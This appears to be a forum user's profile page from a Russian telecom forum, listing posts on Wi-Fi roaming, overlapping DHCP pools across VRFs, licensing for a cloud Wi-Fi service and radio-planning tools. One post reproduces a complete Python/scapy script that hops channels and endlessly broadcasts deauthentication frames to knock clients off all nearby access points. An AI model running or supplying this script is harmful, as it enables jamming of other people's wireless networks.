Jump to content
Калькуляторы

Vladimir-nag.ru

Пользователи
  • Content Count

    52
  • Joined

  • Last visited

About Vladimir-nag.ru

  • Rank
    Абитуриент
  1. Обкатано. Берите.
  2. Вторая волна линейки AC уже идет на Qualcomm
  3. Коллеги. Возник следующий вопрос. Планирую развернуть облачный Wi-Fi сервис с сопутствующими плюшками: авторизация пользователя по СМС, перенаправление на кастомизированный портал с рекламными банерами и т.д. Точки доступа планируется продавать клиенту. Клиент будет их ставить, подключать к сервису через свой интернет-канал и раздавать абонентам Wi-Fi. Техническая сторона дела не интересует. Интересует правовая: какие лицензии и на что я должен получить? Должен ли я становиться официальным оператором связи и должен ли где-то регистрироваться?
  4. Ну т.е. при direct probe request ответят только те точки доступа, которые поддерживают SSID, заявленный в direct запросе. Но в чем реализация-то? По тексту зебры, как мне кажется, говорится, что в рамках direct запроса не все точки с данным SSID ответят, а только одна. Не? only the access point with the minimum load and a minimum signal strength threshold will respond to the client. R
  5. Так а у Вас какая реализация? При роуминге клиента из всех Ваших точек только одна клиенту на запрос отвечает? На какой запрос, Probe Request?
  6. Nemo, а сеть на Zebra в Новосибирском ТЦ Аура - не Ваша работа?
  7. На сколько дбм предлагаете уменьшать мощность на низких MCS по сравнению с высокими?
  8. Скрипт широковещательной отправки Deauth пакетов на python (c хабра): from scapy.all import * import random, time, sys from multiprocessing import Process iface='mon0' def wifi_snif(): pkt = sniff(iface=iface, timeout=1, lfilter= lambda x: x.haslayer(Dot11Beacon) or x.haslayer(Dot11ProbeResp)) u_pkt = [] u_addr2 = [] for p in pkt: if p.addr2 not in u_addr2: u_pkt.append(p) u_addr2.append(p.addr2) return u_pkt def deauth(pkt): os.system("iw dev %s set channel %d" % (iface, ord(pkt[Dot11Elt:3].info))) # меняем канал беспроводного интерфейса sendp(RadioTap()/Dot11(type=0, subtype=12, addr1="ff:ff:ff:ff:ff:ff", addr2=pkt.addr2, addr3=pkt.addr3)/Dot11Deauth(),count=4, iface=iface, verbose=0) def chg_cnl(): while True: cnl = random.randrange(1,12) os.system("iw dev %s set channel %d" % (iface, cnl)) time.sleep(0.3) def main_fnc(): p = Process(target=chg_cnl) p.start() pkt_ssid = wifi_snif() p.terminate() for pkt in pkt_ssid: deauth(pkt) while 1: main_fnc()
  9. Пока наиболее вероятная рабочая версия - под каждый VRF создать на сервере отдельный интерфейс в уникальном VLAN, и на прослушку каждого интерфейса посадить свой отдельный демон DHCP со своим конфиг- и лиз-файлом.
  10. Да, к сожалению нужно только внешним Так задача-то из одного пула выдавать...
  11. Задача: на маршрутизаторе сконфигурированы 2 VRF-lite (в простейшей схеме, а на деле будет гораздо больше). В каждом VRF находится свой клиент, при этом IP подсети у каждого клиента совпадают. Т.е., например, в VRF1 есть клиент с адресным пространством 192.168.1.0/24 и в VRF2 есть клиент с адресным пространством 192.168.1.0/24. Они работают каждый в своем пространстве маршрутизации. Вопрос следующий: надо сверху поставить DHCP сервер, чтобы он раздавал одинаковые пулы IP адресов клиентам в каждом из VRF. Стандартный ISC-DHCP ругается сразу, если создать на нем 2 пула с пересекающимися IP адресами. Че делать? Можно ли как-то настроить ISC-DHCP, или какой альтернативный (желательно опенсорсный) DHCP сервер или технологию можно использовать?
  12. Интересует теоретическая основа вот этого калькулятора: http://nag.ru/calculator/length/ Какие формулы были использованы, какие типы затухания учитывались? Может часть исходников кто выложит, где ведется расчет.
  13. А кто производит редирект и шейпинг? Кто пускает или не пускает абонента в интернет? Требуется доустановка какого-то маршрутизатора?
  14. В дополнение к статье: Программы для радиопланирования: - Tamograph - Ekahau Помимо стандартной возможности нарисовать план помещения и теоретически рассчитать покрытие радиосигнала в этих программах есть возможность зафиксировать уровень сигнала в точках с конкретными GPS координатами. Процесс сводится к "хождению" по требуемому помещению и клацанию клавиши на ноутбуке в определенных местах. В эти моменты программы зафиксируют GPS координаты и уровень сигнала от точки (соответственно потребуются GPS и Wi-Fi адаптеры). Программы для анализа спектра: - Inssider (отображение уровней сигнала от точек) - Chanaliser (с обычным Wi-Fi адаптером функционал аналогичен Inssider, с использованием специального адаптера "Wi-Spy" начинает видеть весь спектр, т.е. не только точки доступа, но и помехи от микроволновок и другой радиоэлектроники) Программы для дампа Wi-Fi трафика: CommView - платная, но чрезвычайно функциональная и удобная. Позволяет дампить и расшифровывать пакеты 802.11 Wireshark - недавно вышла концептуально новая версия программы, в обзоре написано, что версия заточена под Wi-Fi. Сам, честно говоря, еще не успел воспользоваться.
  15. Написано же: WOP-12ac-LR с мощностью 27дБм используются в БШПД проектах. Логично же, в БШПД требуются дальние расстояния. К чему вопросы: "А если я поставлю 10 точек в разных комнатах с мощностью 27дБм?"? Написано: сервисные маршрутизаторы позволяют обеспечить NAT. - "То есть точки сами будут обеспечивать НАТ?". - Нет! NAT обеспечивают сервисные маршрутизаторы ESR-1000. Читайте внимательно.